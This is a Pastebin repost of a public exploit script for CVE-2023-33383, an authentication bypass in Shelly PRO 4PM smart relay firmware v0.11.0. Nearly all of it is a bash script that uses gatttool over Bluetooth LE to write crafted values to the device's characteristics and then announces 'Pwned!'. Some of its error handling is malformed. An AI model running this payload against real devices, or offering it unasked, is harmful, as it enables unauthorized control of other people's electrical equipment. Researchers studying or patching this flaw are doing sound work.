Advertisement
FlyFar

Shelly PRO 4PM v0.11.0 - Authentication Bypass - CVE-2023-33383

Jan 22nd, 2024
754
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.15 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
  4. # Google Dork: NA
  5. # Date: 2nd August 2023
  6. # Exploit Author: The Security Team [exploitsecurity.io]
  7. # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
  8. # Vendor Homepage: https://www.shelly.com/
  9. # Software Link: NA
  10. # Version: Firmware v0.11.0 (REQUIRED)
  11. # Tested on: MacOS/Linux
  12. # CVE : CVE-2023-33383
  13.  
  14. IFS=
  15. failed=$false
  16. RED="\e[31m"
  17. GREEN="\e[92m"
  18. WHITE="\e[97m"
  19. ENDCOLOR="\e[0m"
  20. substring="Connection refused"
  21.  
  22.  
  23. banner()
  24.     {
  25.         clear
  26.         echo -e "${GREEN}[+]*********************************************************[+]"
  27.         echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
  28.         echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
  29.         echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
  30.         echo -e "${GREEN}[+]*********************************************************[+]"
  31.         echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
  32.     }
  33.  
  34. banner
  35. read -s -n 1 key
  36. if [ "$key" = "x" ]; then
  37.     exit 0;
  38. elif [ "$key" = "" ]; then
  39.     gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
  40.     if [ -z "$gattout" ]; then
  41.         echo -e "${RED}Connection timed out${ENDCOLOR}"
  42.         exit 0;
  43.     else
  44.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
  45.     echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
  46.     sleep 1
  47.     if [ $? -eq 1 ]; then
  48.        $failed=$true
  49.        exit 0;
  50.     fi
  51.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
  52.     sleep 1
  53.     if [ $? -eq 1 ]; then
  54.         $failed=$true
  55.         echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
  56.         exit 0;
  57.     else
  58.        sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
  59.        sleep 1
  60.        for i in {1..5}
  61.        do
  62.           echo -ne "${GREEN}."
  63.           sleep 1
  64.        done
  65.        echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
  66.     fi
  67. fi
  68. fi
  69.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement